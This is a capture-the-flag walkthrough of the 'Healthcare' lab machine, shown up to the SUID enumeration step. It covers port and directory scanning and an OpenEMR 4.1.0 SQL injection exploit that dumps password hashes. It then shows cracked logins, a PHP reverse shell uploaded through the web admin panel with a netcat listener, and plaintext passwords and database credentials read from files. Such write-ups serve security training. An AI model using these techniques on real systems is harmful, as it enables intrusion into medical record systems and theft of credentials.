Healthcare_1 Target Machine


Information Gathering

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:30 EDT
Nmap scan report for 192.1.1.141
Host is up (0.000064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

Only ports 21 and 80 are open. Let's also look at the UDP scan results.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.141
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 13:23 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00022s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds

Focus on ports 21 and 80.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:31 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3d
80/tcp open http Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
|_http-title: Coming Soon 2
| http-robots.txt: 8 disallowed entries
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 00:0C:29:95:F1:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.38
OS details: Linux 2.6.38
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds

Note the robots.txt file.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:32 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
| Hosts that seem down (vulnerable):
|_ 224.0.0.251
Nmap scan report for 192.1.1.141
Host is up (0.00018s latency).

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server\'s resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-fileupload-exploiter:
|
| Couldn\'t find a file-type field.
|
| Couldn\'t find a file-type field.
|
|_ Couldn\'t find a file-type field.
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 354.24 seconds

Nothing much gained there. Let's look at the web interface's robots.txt and FTP on port 21.

Web Penetration

FTP revealed the version ProFTPD 1.3.3d. Searching for vulnerabilities in that version turned up nothing. Anonymous login also failed. Next, the web service:

# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /

Based on the comments in robots.txt, it seems that using User-agent: htdig might allow viewing the index, and that /all_our_e-mail_addresses and /admin/ are traps for crawler bots.

In principle robots.txt is only a gentlemen's agreement; it is unclear whether accessing the directories above requires a special User-agent, so just try them all.

Directory Brute-forcing

Directory brute-forcing runs in parallel.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo dirsearch -u http://192.1.1.141
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/_23-08-09_18-40-10.txt

Error Log: /root/.dirsearch/logs/errors-23-08-09_18-40-10.log

Target: http://192.1.1.141/

[18:40:10] Starting:
[18:40:10] 301 - 334B - /js -> http://192.1.1.141/js/
[18:40:11] 403 - 997B - /.cgi
[18:40:12] 403 - 997B - /.ht_wsr.txt
[18:40:12] 403 - 997B - /.htaccess.orig
[18:40:12] 403 - 997B - /.htaccess.save
[18:40:12] 403 - 997B - /.htaccess.sample
[18:40:12] 403 - 997B - /.htaccess.bak1
[18:40:12] 403 - 997B - /.htaccessOLD
[18:40:12] 403 - 997B - /.htaccessOLD2
[18:40:12] 403 - 997B - /.htaccess_orig
[18:40:12] 403 - 997B - /.htaccessBAK
[18:40:12] 403 - 997B - /.htaccess_sc
[18:40:12] 403 - 997B - /.htaccess_extra
[18:40:12] 403 - 997B - /.html
[18:40:12] 403 - 997B - /.htm
[18:40:12] 403 - 997B - /.httr-oauth
[18:40:12] 403 - 997B - /.htpasswd_test
[18:40:12] 403 - 997B - /.htpasswds
[18:40:14] 403 - 997B - /AT-admin.cgi
[18:40:16] 403 - 997B - /WebShell.cgi
[18:40:17] 403 - 997B - /accounts.cgi
[18:40:17] 403 - 997B - /adm.cgi
[18:40:17] 403 - 997B - /admin.cgi
[18:40:22] 403 - 997B - /apply.cgi
[18:40:22] 403 - 997B - /auth.cgi
[18:40:23] 403 - 997B - /cachemgr.cgi
[18:40:23] 403 - 1011B - /cgi-bin/
[18:40:24] 200 - 1KB - /cgi-bin/test.cgi
[18:40:25] 301 - 335B - /css -> http://192.1.1.141/css/
[18:40:26] 403 - 997B - /dcadmin.cgi
[18:40:27] 403 - 1011B - /error/
[18:40:27] 200 - 1KB - /favicon.ico
[18:40:28] 301 - 337B - /fonts -> http://192.1.1.141/fonts/
[18:40:28] 403 - 997B - /hndUnblock.cgi
[18:40:29] 301 - 338B - /images -> http://192.1.1.141/images/
[18:40:29] 403 - 1011B - /images/
[18:40:29] 200 - 5KB - /index.html
[18:40:29] 200 - 5KB - /index
[18:40:30] 403 - 1011B - /js/
[18:40:31] 403 - 997B - /login.cgi
[18:40:32] 403 - 997B - /members.cgi
[18:40:33] 403 - 997B - /mt-check.cgi
[18:40:34] 403 - 997B - /out.cgi
[18:40:34] 403 - 997B - /perlcmd.cgi
[18:40:35] 403 - 59B - /phpMyAdmin
[18:40:36] 403 - 59B - /phpMyAdmin/
[18:40:36] 403 - 59B - /phpMyAdmin/index.php
[18:40:36] 403 - 59B - /phpMyAdmin/scripts/setup.php
[18:40:36] 403 - 59B - /phpMyAdmin/phpMyAdmin/index.php
[18:40:37] 403 - 997B - /ps_admin.cgi
[18:40:37] 200 - 620B - /robots.txt
[18:40:38] 403 - 1011B - /server-status/
[18:40:38] 403 - 997B - /server-status
[18:40:38] 403 - 997B - /server-info
[18:40:39] 403 - 997B - /signin.cgi
[18:40:43] 403 - 1011B - /vendor/

The only really useful find is /cgi-bin/test.cgi. Let's brute-force the /cgi-bin directory.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo dirsearch -u http://192.1.1.141/cgi-bin/ -e cgi,sh

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 9515

Output File: /root/.dirsearch/reports/192.1.1.141/-cgi-bin-_23-08-10_11-15-35.txt

Error Log: /root/.dirsearch/logs/errors-23-08-10_11-15-35.log

Target: http://192.1.1.141/cgi-bin/

[11:15:35] Starting:
[11:15:36] 403 - 997B - /cgi-bin/.ht_wsr.txt
[11:15:36] 403 - 997B - /cgi-bin/.htaccess.sample
[11:15:36] 403 - 997B - /cgi-bin/.htaccess.bak1
[11:15:36] 403 - 997B - /cgi-bin/.htaccess_extra
[11:15:36] 403 - 997B - /cgi-bin/.htaccess.orig
[11:15:36] 403 - 997B - /cgi-bin/.htaccessOLD2
[11:15:36] 403 - 997B - /cgi-bin/.htaccess_orig
[11:15:36] 403 - 997B - /cgi-bin/.htaccess.save
[11:15:36] 403 - 997B - /cgi-bin/.htaccessBAK
[11:15:36] 403 - 997B - /cgi-bin/.htaccess_sc
[11:15:36] 403 - 997B - /cgi-bin/.htaccessOLD
[11:15:36] 403 - 997B - /cgi-bin/.html
[11:15:36] 403 - 997B - /cgi-bin/.htpasswds
[11:15:36] 403 - 997B - /cgi-bin/.httr-oauth
[11:15:36] 403 - 997B - /cgi-bin/.htpasswd_test
[11:15:36] 403 - 997B - /cgi-bin/.htm
[11:16:03] 200 - 1KB - /cgi-bin/test.cgi

Task Completed

Apart from test.cgi there are no other accessible files. Add the User-agent and brute-force again.

sudo dirsearch -u http://192.1.1.141 --user-agent="User-agent: htdig"

No other results. Also, the index page is index.html.

So what is this User-agent actually for? Save htdig as a wordlist candidate for now.

The web page is simple; the countdown is driven by a script.

To summarize, the possible attack paths identified so far: the directories in robots.txt (although none are accessible), the test.cgi file, and FTP on port 21.

Searching for "test cgi exploit" shows that certain bash versions are vulnerable, but the exploitation attempt failed.

Tried brute-forcing port 21 with the guessed usernames htdig and oden; this failed.

I was stuck here for a long time without any ideas. In the end I checked a walkthrough and found the problem was the brute-force wordlist...

A reminder to myself: I had never considered the choice of directory wordlist and blindly used /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt. But why does Kali only ship the 2.3-medium version by default and not the big one?

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.141 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.141
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/11 14:00:52 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 5031]
/images (Status: 301) [Size: 338] [--> http://192.1.1.141/images/]
/css (Status: 301) [Size: 335] [--> http://192.1.1.141/css/]
/js (Status: 301) [Size: 334] [--> http://192.1.1.141/js/]
/vendor (Status: 301) [Size: 338] [--> http://192.1.1.141/vendor/]
/favicon (Status: 200) [Size: 1406]
/robots (Status: 200) [Size: 620]
/fonts (Status: 301) [Size: 337] [--> http://192.1.1.141/fonts/]
/gitweb (Status: 301) [Size: 338] [--> http://192.1.1.141/gitweb/]
/phpMyAdmin (Status: 403) [Size: 59]
/server-status (Status: 403) [Size: 997]
/server-info (Status: 403) [Size: 997]
/openemr (Status: 301) [Size: 339] [--> http://192.1.1.141/openemr/]
Progress: 1272284 / 1273834 (99.88%)
===============================================================
2023/08/11 14:06:40 Finished
===============================================================

OpenEMR 4.1.0 SQL Injection Vulnerability

A hidden directory /openemr was found; visit that page.

There are two approaches: the version information is visible here, so one can search for vulnerabilities in that version; alternatively, if exploitation fails, brute-forcing is an option.

Start with the simple one, looking up vulnerabilities: search for OpenEMR 4.1.0.

An exploit exists, so review it, modify the URL inside, and run it locally.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ python 49742.py

____ ________ _______ __ __ ___ ____
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_)
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike

[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d

It presumably used automated blind injection to retrieve the usernames and passwords, but the passwords look like hashes. Try cracking them with an online tool.

Two username/password pairs obtained: admin:ackbar and medical:medical.

Try logging in to both the website and FTP.

Getting a Shell via Backend File Upload

admin logged in to the website successfully; medical logged in to FTP successfully.

After searching around the site, I found a file upload entry point (I first looked at the site's directory structure via FTP; due to permissions, files cannot be uploaded to the web directory via FTP).

Upload a classic PHP reverse shell directly, then browse to its path http://192.1.1.141/openemr/sites/default/images/php-reverse-shell.php to get a shell.

Success.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.141] 60168
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
15:51:06 up 21:22, 0 users, load average: 1.00, 1.06, 1.07
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache
sh-4.1$ id
id
uid=479(apache) gid=416(apache) groups=416(apache)
sh-4.1$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:95:f1:6a brd ff:ff:ff:ff:ff:ff
inet 192.1.1.141/24 brd 192.1.1.255 scope global eth1
inet6 fe80::20c:29ff:fe95:f16a/64 scope link
valid_lft forever preferred_lft forever
ip a
sh-4.1$ uname -a
uname -a
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux

sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"

Searching around in FTP

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ ftp 192.1.1.141
Connected to 192.1.1.141.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.1.1.141]
Name (192.1.1.141:kali): medical
331 Password required for medical
Password:
230 User medical logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to I
ftp> ls
229 Entering Extended Passive Mode (|||48953|)
150 Opening ASCII mode data connection for file list
drwxr--r-- 2 medical medical 4096 Nov 5 2011 Desktop
drwx------ 2 medical medical 4096 Nov 5 2011 Documents
drwx------ 2 medical medical 4096 Oct 27 2011 Downloads
drwx------ 2 medical medical 4096 Jan 19 2010 Movies
drwx------ 2 medical medical 4096 Jan 19 2010 Music
drwx------ 2 medical medical 4096 Oct 27 2011 Pictures
drwxr-xr-x 2 medical medical 4096 Jul 20 2011 Templates
drwxr-xr-x 2 medical medical 4096 Jul 20 2011 Videos
drwx------ 9 medical medical 4096 Nov 5 2011 tmp
226 Transfer complete
ftp> cd Desktop
250 CWD command successful
ftp> ls -liah
229 Entering Extended Passive Mode (|||24046|)
150 Opening ASCII mode data connection for file list
drwxr--r-- 2 medical medical 4.0k Nov 5 2011 .
drwxr-xr-x 31 medical medical 4.0k Nov 5 2011 ..
-rwxr-xr-x 1 medical medical 265 Jul 3 2011 Get Libre Office.desktop
-rwxr-xr-x 1 medical medical 229 Apr 12 2010 addlocale.desktop
-rwxr-xr-x 1 medical medical 225 Apr 12 2010 drakfirewall.desktop
-rwxr-xr-x 1 medical medical 1.2k Apr 12 2010 draknetcenter.desktop
226 Transfer complete
ftp> cd ..
250 CWD command successful

Nothing on the desktop; look at the other directories.

ftp> ls -liah
229 Entering Extended Passive Mode (|||43237|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 31 medical medical 4.0k Nov 5 2011 .
drwxr-xr-x 5 root root 4.0k Jul 29 2020 ..
-rw------- 1 medical medical 5.9k Nov 5 2011 .ICEauthority
-rw------- 1 medical medical 120 Nov 5 2011 .Xauthority
drwx------ 3 medical medical 4.0k Nov 5 2011 .adobe
-rw-r--r-- 1 medical medical 193 Sep 24 2011 .bash_profile
-rw-rw-r-- 1 medical medical 145 Sep 6 2011 .bashrc
drwxr-xr-x 3 medical medical 4.0k Nov 5 2011 .cache
drwx------ 11 medical medical 4.0k Nov 5 2011 .config
drwx------ 3 medical medical 4.0k Oct 27 2011 .dbus
-rwxrwxr-x 1 root root 14 Nov 5 2011 .desktop
-rw------- 1 medical medical 28 Nov 5 2011 .dmrc
-rw------- 1 medical medical 16 Oct 27 2011 .esd_auth
drwxr-xr-x 2 medical medical 4.0k Nov 5 2011 .fontconfig
drwx------ 4 medical medical 4.0k Nov 5 2011 .gconf
drwx------ 2 medical medical 4.0k Nov 5 2011 .gconfd
-rw-r----- 1 medical medical 0 Nov 5 2011 .gksu.lock
drwx------ 9 medical medical 4.0k Nov 5 2011 .gnome2
drwx------ 2 medical medical 4.0k Jul 20 2011 .gnome2_private
drwx------ 3 medical medical 4.0k Oct 27 2011 .gnupg
-rw-rw-r-- 1 medical medical 326 Nov 5 2011 .gtk-bookmarks
drwxrwxr-x 2 medical medical 4.0k Oct 27 2011 .icons
drwxr-xr-x 3 medical medical 4.0k Jul 20 2011 .local
drwx------ 3 medical medical 4.0k Oct 27 2011 .macromedia
-rw-r--r-- 1 medical medical 0 Oct 23 2010 .mdk-menu-migrated
-rw-rw-r-- 1 medical medical 0 Nov 5 2011 .menu-updates.stamp
drwx------ 4 medical medical 4.0k Oct 27 2011 .mozilla
drwx------ 3 medical medical 4.0k Oct 27 2011 .mysqlgui
drwxr-xr-x 2 medical medical 4.0k Oct 23 2010 .nautilus
drwx------ 3 medical medical 4.0k Nov 5 2011 .pki
drwx------ 2 medical medical 4.0k Oct 27 2011 .pulse
-rw------- 1 medical medical 256 Oct 27 2011 .pulse-cookie
drwxrwxr-x 2 medical medical 4.0k Jul 20 2011 .themes
drwx------ 3 medical medical 4.0k Jul 20 2011 .thumbnails
-rw-r--r-- 1 medical medical 1.9k Jul 6 2011 .xbindkeysrc
drwxr--r-- 2 medical medical 4.0k Nov 5 2011 Desktop
drwx------ 2 medical medical 4.0k Nov 5 2011 Documents
drwx------ 2 medical medical 4.0k Oct 27 2011 Downloads
drwx------ 2 medical medical 4.0k Jan 19 2010 Movies
drwx------ 2 medical medical 4.0k Jan 19 2010 Music
drwx------ 2 medical medical 4.0k Oct 27 2011 Pictures
drwxr-xr-x 2 medical medical 4.0k Jul 20 2011 Templates
drwxr-xr-x 2 medical medical 4.0k Jul 20 2011 Videos
drwx------ 9 medical medical 4.0k Nov 5 2011 tmp
226 Transfer complete
ftp> cd Documents
250 CWD command successful
ftp> ls -alih
229 Entering Extended Passive Mode (|||35557|)
150 Opening ASCII mode data connection for file list
drwx------ 2 medical medical 4.0k Nov 5 2011 .
drwxr-xr-x 31 medical medical 4.0k Nov 5 2011 ..
-rwxr-xr-x 1 medical medical 33.8k Nov 4 2011 OpenEMR Passwords.pdf
-rw-rw-r-- 1 medical medical 82 Oct 27 2011 Passwords.txt

Found Passwords.txt.

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ cat Passwords.txt
PCLINUXOS MEDICAL
root-root
medical-medical


OPENEMR
admin-admin
medical-medical

Three password pairs obtained. Since we already have a shell, try these pairs directly, and use /etc/passwd to narrow the user list (i.e., exclude admin).

bash-4.1$ su medical
su medical
Password: medical

[medical@localhost /]$ whoami
whoami
medical
[medical@localhost /]$ su -
su -
Password: root

su: incorrect password
[medical@localhost /]$ su root
su root
Password: root

su: incorrect password
[medical@localhost /]$ sudo -l
sudo -l
bash: sudo: command not found
[medical@localhost /]$ whoami
whoami
medical
[medical@localhost /]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)
[medical@localhost /]$ ls -liah /etc/passwd
ls -liah /etc/passwd
134072 -rw-r--r-- 1 root root 2.0K Jul 29 2020 /etc/passwd
[medical@localhost /]$ ls -liah /etc/shadow
ls -liah /etc/shadow
131337 -r--r----- 1 root shadow 1.1K Jul 29 2020 /etc/shadow

Although "root" is not the root user's password, we still got logged in as the medical user.

Check the home directory.

[medical@localhost ~]$ ls -liah
ls -liah
total 168K
267486 drwxr-xr-x 31 medical medical 4.0K Nov 5 2011 ./
262657 drwxr-xr-x 5 root root 4.0K Jul 29 2020 ../
267487 -rw------- 1 medical medical 5.9K Nov 5 2011 .ICEauthority
267488 -rw------- 1 medical medical 120 Nov 5 2011 .Xauthority
267489 drwx------ 3 medical medical 4.0K Nov 4 2011 .adobe/
267493 -rw-r--r-- 1 medical medical 193 Sep 24 2011 .bash_profile
267494 -rw-rw-r-- 1 medical medical 145 Sep 6 2011 .bashrc
267495 drwxr-xr-x 3 medical medical 4.0K Nov 5 2011 .cache/
267515 drwx------ 11 medical medical 4.0K Nov 5 2011 .config/
414952 drwx------ 3 medical medical 4.0K Oct 27 2011 .dbus/
267552 -rwxrwxr-x 1 root root 14 Nov 4 2011 .desktop*
267553 -rw------- 1 medical medical 28 Nov 5 2011 .dmrc
267554 -rw------- 1 medical medical 16 Oct 27 2011 .esd_auth
414955 drwxr-xr-x 2 medical medical 4.0K Nov 4 2011 .fontconfig/
414961 drwx------ 4 medical medical 4.0K Nov 5 2011 .gconf/
415106 drwx------ 2 medical medical 4.0K Nov 5 2011 .gconfd/
267555 -rw-r----- 1 medical medical 0 Nov 5 2011 .gksu.lock
267556 drwx------ 9 medical medical 4.0K Nov 4 2011 .gnome2/
267574 drwx------ 2 medical medical 4.0K Jul 19 2011 .gnome2_private/
267575 drwx------ 3 medical medical 4.0K Oct 27 2011 .gnupg/
267578 -rw-rw-r-- 1 medical medical 326 Nov 5 2011 .gtk-bookmarks
267579 drwxrwxr-x 2 medical medical 4.0K Oct 27 2011 .icons/
267580 drwxr-xr-x 3 medical medical 4.0K Jul 19 2011 .local/
415110 drwx------ 3 medical medical 4.0K Oct 27 2011 .macromedia/
267603 -rw-r--r-- 1 medical medical 0 Oct 22 2010 .mdk-menu-migrated
267604 -rw-rw-r-- 1 medical medical 0 Nov 5 2011 .menu-updates.stamp
415118 drwx------ 4 medical medical 4.0K Oct 27 2011 .mozilla/
415194 drwx------ 3 medical medical 4.0K Oct 27 2011 .mysqlgui/
415199 drwxr-xr-x 2 medical medical 4.0K Oct 22 2010 .nautilus/
415200 drwx------ 3 medical medical 4.0K Nov 5 2011 .pki/
415205 drwx------ 2 medical medical 4.0K Oct 27 2011 .pulse/
267605 -rw------- 1 medical medical 256 Oct 27 2011 .pulse-cookie
267606 drwxrwxr-x 2 medical medical 4.0K Jul 19 2011 .themes/
267607 drwx------ 3 medical medical 4.0K Jul 19 2011 .thumbnails/
267622 -rw-r--r-- 1 medical medical 1.9K Jul 6 2011 .xbindkeysrc
267623 drwxr--r-- 2 medical medical 4.0K Nov 5 2011 Desktop/
267628 drwx------ 2 medical medical 4.0K Nov 4 2011 Documents/
267631 drwx------ 2 medical medical 4.0K Oct 27 2011 Downloads/
267633 drwx------ 2 medical medical 4.0K Jan 19 2010 Movies/
267634 drwx------ 2 medical medical 4.0K Jan 19 2010 Music/
267635 drwx------ 2 medical medical 4.0K Oct 27 2011 Pictures/
267637 drwxr-xr-x 2 medical medical 4.0K Jul 19 2011 Templates/
267638 drwxr-xr-x 2 medical medical 4.0K Jul 19 2011 Videos/
267639 drwx------ 9 medical medical 4.0K Nov 5 2011 tmp/

Consistent with what was seen in FTP. Look in the web directory for the database config file, then try the database password against root.

[medical@localhost default]$ ls
ls
LBF/ edi/ images/ statement.inc.php
clickoptions.txt era/ letter_templates/
config.php faxcover.txt referral_template.html
documents/ faxtitle.eps sqlconf.php
[medical@localhost default]$ cat sqlconf.php
cat sqlconf.php
<?php
// OpenEMR
// MySQL Config

$host = 'localhost';
$port = '3306';
$login = 'openemr';
$pass = 'openemr';
$dbase = 'openemr';

//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;

$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>
[medical@localhost default]$ su -
su -
Password: openemr

su: incorrect password

Privilege Escalation via the PATH Environment Variable

Failed. Let's look at SUID files.

[medical@localhost default]$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
147863 12 -rwsr-xr-x 1 root root 9564 Sep 3 2011 /usr/libexec/pt_chown
147695 236 -rws--x--x 1 root root 238352 Sep 8 2011 /usr/lib/ssh/ssh-keysign
145819 8 -rwsr-xr-x 1 root polkituser 5748 Apr 5 2010 /usr/lib/polkit-resolve-exe-helper
145811 12 -rwsr-xr-x 1 root root 9108 Aug 29 2011 /usr/lib/polkit-1/polkit-agent-helper-1
139126 12 -rwsr-xr-x 1 root root 9940 Nov 2 2011 /usr/lib/chromium-browser/chrome-sandbox
145817 8 -rwsr-xr-- 1 root polkituser 7580 Apr 5 2010 /usr/lib/polkit-grant-helper-pam
145821 16 -rwsr-xr-x 1 polkituser root 16356 Apr 5 2010 /usr/lib/polkit-set-default-helper
147975 12 -rwsr-xr-x 1 root root 10757 Jun 11 2011 /usr/sbin/fileshareset
148146 12 -rwsr-xr-x 1 root root 12036 Nov 28 2010 /usr/sbin/traceroute6
148168 12 -rwsr-xr-x 1 root root 10713 Aug 2 2011 /usr/sbin/usernetctl
148166 36 -rwsr-xr-x 1 root root 33324 Nov 9 2009 /usr/sbin/userhelper
136381 40 -rwsr-sr-x 1 root root 39020 Jun 26 2011 /usr/bin/crontab
136286 44 -rwsr-sr-x 1 daemon daemon 41036 Jan 19 2010 /usr/bin/at
137295 32 -rwsr-xr-x 1 root root 28916 Dec 28 2010 /usr/bin/pumount
136305 4 -rwsr-sr-x 1 daemon daemon 137 Jan 19 2010 /usr/bin/batch
136529 16 -rwsr-xr-x 1 root root 15848 Jan 9 2010 /usr/bin/expiry
137125 32 -rws--x--x 1 root root 28752 Jan 9 2010 /usr/bin/newgrp
137230 20 -rwsr-xr-x 1 root root 16920 Aug 29 2011 /usr/bin/pkexec
137590 120 -rwsr-xr-x 1 root root 122188 Nov 28 2010 /usr/bin/wvdial
137249 40 -rwsr-xr-x 1 root root 39488 Dec 28 2010 /usr/bin/pmount
137440 64 -rws--x--x 1 root root 63752 Jan 23 2010 /usr/bin/sperl5.10.1
136717 364 -rwsr-xr-x 1 root root 370648 Jan 18 2011 /usr/bin/gpgsm
136708 56 -rwsr-xr-x 1 root root 56100 Jan 9 2010 /usr/bin/gpasswd
136347 16 -rws--x--x 1 root root 12400 Nov 16 2010 /usr/bin/chfn
137462 32 -r-sr-xr-x 1 root root 31144 Nov 16 2010 /usr/bin/su
137181 24 -r-s--x--x 1 root shadow 20512 Jan 30 2010 /usr/bin/passwd
136709 936 -rwsr-xr-x 1 root root 956252 Oct 18 2010 /usr/bin/gpg
132151 8 -rwsr-sr-x 1 root root 5813 Jul 29 2020 /usr/bin/healthcheck
136247 8 -rwsr-xr-x 1 root root 5852 Sep 22 2011 /usr/bin/Xwrapper
